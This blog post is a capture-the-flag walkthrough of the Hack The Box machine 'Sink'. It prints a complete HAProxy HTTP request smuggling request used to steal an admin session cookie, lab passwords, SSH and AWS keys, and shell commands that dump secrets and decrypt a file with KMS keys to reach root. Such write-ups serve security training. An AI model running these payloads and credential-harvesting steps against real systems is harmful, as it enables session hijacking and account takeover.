Sink From Hack The Box.
Hello everyone, welcome to my blog. In this blog I'm gonna show you how to get root for sink machine which is a insane machine from Hack The Box, done by MrR3boot.
Lets begin,
Lets start with nmap scan
 | |||||
| Nmap Scan Report. |
So there are 3 open ports:
1) 22 : SSH
2) 3000 : PPP -> Gitea 1.12.6 Running
3) 5000 : UPNP -> Gunicorn 20.0.0 Running
Both 3000 and 5000 are HTTP ports.
After a lot of enumeration on both websites i got nothing.
Then i intercepted the request using burpsuite and found a hell lot of information.
Now let's intercept http://sink.htb:5000 and http://sink.htb:3000 (update your /etc/hosts file).
After intercepting http://sink.htb:3000 using burpsuite I found some cookies. Copy them.
Copy those cookies.
Then lets move on to http://sink.htb:5000 and create an account. And login with those credentials.
Then intercept the home page using burp and you will get a session cookie. Copy that cookie.
Copy that cookie.
Now lets dig deeper. After some enumeration i intercepted http://sink.htb:5000/ again and sent it to repeater. We found some juicy information over there.
As you can see it is running Gunicorn server via HAProxy.
After some enumeration about HAProxy and for its exploits I found one exploit.
HTTP Request Smuggling Vulnerability.
View this video for a more understanding about HAProxy HTTP Request Smuggling.
After watching this video and reading the article Finally it's time to get admin access.
Now lets post a comment on http://sink.htb:5000/ and intercept its request and send it to repeater.
 | |
| Leave a Comment |
Submit the comment and intercept it using burp suite. Send the request to repeater and lets perform HTTP Request Smuggling Exploit.
Copy the previous _csrf and i_love_gitea cookies and leave the session cookie as it is.
Now as the POC shows we need to add
///// Paste the above request in repeater tab.
Host: 10.10.10.225:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 648
Origin: http://10.10.10.225:5000
Connection: keep-alive
DNT: 1
Referer: http://10.10.10.225:5000/home
Cookie: {Your Cookies}
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
5
msg=a
0
POST /comment HTTP/1.1
Host: localhost:5000
Cookie: {Your Cookies}
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
Connection: keep-alive
msg=
//////
Once it is done click /n button beside raw (its available on 2020.12 version of burp suite) like the below photo.
Click \n beside Raw button in order to do HTTP Request Smuggling.
Once it is done send the request and reload your home page. Once you reloaded you will see admin session cookie. Copy the admin session cookie and paste it using any cookie editor or using inspect element option via your browser.
And boom we are admin.
Now lets start recon the website again. After some time I navigated to Notes directory when I found there are 3 Notes written by admin. Lets read them.
1) Chef Login : http://chef.sink.htb (1st note details)
Username : chefadm
Password : /6'fEGC&zEx{4]zz
2) Dev Node URL : http://code.sink.htb (2nd note details)
Username : root
Password : FaH@3L>Z3})zzfQ3
3) Nagios URL : https://nagios.sink.htb (3rd note details)
Username : nagios_adm
Password : g8<H6GK\{*L.fB3C
Now after a while i thought to use these creds for http://sink.htb:3000 website.
Lets check them.
1st login credentials and 3rd login credentials gave me no luck.
But 2nd login credentials me root login.
Now lets look at each repository.
After a lot of time I found 2 useful resources.
1) Marcus ssh key.
2) AWS access and secret key.
We can find Marcus SSH key in the Key_Generation Repository. Then go to commits and Adding EC2 Key Management Structure.
We can find AWS access and secret key at Log_Management Repository. Then go to commit and Preparing for prod
Copy that SSH key give the needed permissions and ssh to Marcus.
1) Copy the key into key_marcus(File Name)
2) chmod 600 key_marcus(File Name)
3) ssh -i key_marcus marcus@sink.htb
And then boom we got our user shell(Low Privileged Shell)
You can get user.txt at /home/marcus directory.
Now Privilege Escalation part(Terrible!!!!!):
after doing enumeration for a lot of time my dumb ass brain remembered about the AWS access key and secret key.
Lets use those details and configure AWS in Marcus user shell.
Type the below commands:
marcus@sink:~$ aws configure
AWS Access Key ID [****************ITJQ]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [****************0ddF]: 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
Default region name [eu]: eu
Default output format [json]: json
marcus@sink:~$
And then lets list the secrets using the below command
marcus@sink:-$ aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets
Now we can get david username and password using the above code
marcus@sink:-$ aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-NDuqV"
Username: david
Password: EALB=bcC=`a7f2#k
Lets su to david user.
marcus@sink: su david
password: EALB=bcC=`a7f2#k
And boom we are david user.
Now to get root shell go to the David home directory.
There is only one directory in David that is Projects. Go to Projects directory and Project has Prod_Deployment directory. Go to the following directory.
In the Prod_Deployment directory we have server.enc file which is encrypted.
After a lot of time and a lot of analysis i got to know that this project comes with listkeys.
So lets configure AWS again in David shell.
david@sink:~$ aws configure
AWS Access Key ID [****************ITJQ]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [****************0ddF]: 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
Default region name [eu]: eu
Default output format [json]: json
And lets list the keys AWS
david@sink:-$ aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys
After some time I got to know how to decrypt the key using AWS list-keys
david@sink:-$for KEY in $(aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{ print $4 }'); do aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "${KEY}"; aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "${KEY}" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext"; done
Here we got admin credentials using which we can get root shell.
Username: admin
Password: _uezduQ!EY5AHfe2
There we go. We are root now.
You can see root.txt in root directory.
This box is really insane and hats off to MrR3boot for this amazing machine.
Comments
Post a Comment